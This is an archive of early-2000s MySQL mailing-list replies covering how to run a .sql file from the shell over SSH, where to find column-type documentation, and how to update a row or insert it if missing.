SV: CREATE TABLE / Telnet (Linux / Unix server)
This command should be invoked from the shell as the command: mysql --user mysqlusername -pmysqlpasswd database test.sql is actually running the mysql frontend with a username, password choosing database named "database" and executing all commands from test.sql before exiting. If you want to invoke the same command from within mysql frontend you write (after choosing \u "database") mysql \. test.sql or you could actually just copy and past the items if you have an ssh og telnet which support copying and pasting from your favorite workstation to your favorite server :o) (I do that sometimes, but it's a lazy thing to) mvh: Pl Wester, programmerer never.no as, stortingsgt 30, 0161 Oslo tlf: 22 01 66 20, fax: 22 01 66 21 direkte: 22 01 66 34, 906 900 62 http://never.no - icq:103476059 ~ f u cn rd ts u prb a gk ~ -Opprinnelig melding- Fra: C.o.m.b.u.s.t. Now, in the book it doesn't specify whether or not you have to be on the computer with the server, or if you can send the .sql file command from your computer to the remote server, sort of like a file transfer protocol as well. Basically, my question is, do I have to either FTP my files to the server, and then execute the command, or can I do it remotely without FTP? Or is it possible AT ALL to execute the command from a remote computer? In case it helps, I am on a Windows 98 system connected through SSH to an Linux system running Apache. Please help, I'm stuck and I won't give up until I'm un-stuck! Thanks in advance to all that reply. The file must be on the remote machine (as has been answered), but yes, if you are connected to the shell (via telnet/ssh/ssh2/etc), you can execute the command. And, no, the extension may be anything (all you're doing is redirecting the contents of the file (via '') into the 'mysql database' command. HTH, Jon A. SV: afraid of using mysql!
mysql is easy if you're familiar with SQL92 standards, if you are a Oracle-guru you will see that mysql doesn't support half as many things... One things I really miss is subqueries. Most of the time I get all my answers from the DOC: http://www.mysql.com/doc/ search for keywords and you'll probably find it... I searched for "varchar": http://www.mysql.com/doc/C/o/Column_types.html http://www.mysql.com/doc/O/t/Other-vendor_column_types.html good luck :o) mvh: Pl Wester, programmerer never.no as, stortingsgt 30, 0161 Oslo tlf: 22 01 66 20, fax: 22 01 66 21 direkte: 22 01 66 34, 906 900 62 http://never.no - icq:103476059 ~ f u cn rd ts u prb a gk ~ -Opprinnelig melding- Fra: php php [mailto:[EMAIL PROTECTED]] Sendt: 11. februar 2001 20:10 Til: [EMAIL PROTECTED] Emne: afraid of using mysql! SV: If exists UPDATE else INSERT
Why not do an update regardless if the record exist or not, then insert it if you get an error? -Opprinnelig melding- Fra: Artem Koutchine [mailto:[EMAIL PROTECTED]] Sendt: 26. januar 2001 19:02 Til: [EMAIL PROTECTED]; [EMAIL PROTECTED] Emne: Re: If exists UPDATE else INSERT I've seen something about this in the manual. At the moment the problem was how to call such an SQL command (like REPLACE for DELETE/INSERT). I wonder if it was implemented in 3.23.32 or is it only in 4.x? - Original Message - From: "Jan Willamowius" [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, January 26, 2001 7:34 PM Subject: If exists UPDATE else INSERT I'm have a lot of queries where i have to check if a record exists and if it does, increment a counter in it (most of the time). If it doesn't exist I insert a new record with counter=1 (this case is rare). Right now I do a select form Perl and then do one or the other. To speed things up I could always do an INSERT IGNORE and always an UPDATE. This would save one statement on the INSERT case, but that is rare anyway. I'd really like to do this in one (fast) statement, since this is a real time application with literally milions of UPDATEs that come in this way every day. Would it be possible to write a UDF to do this ?
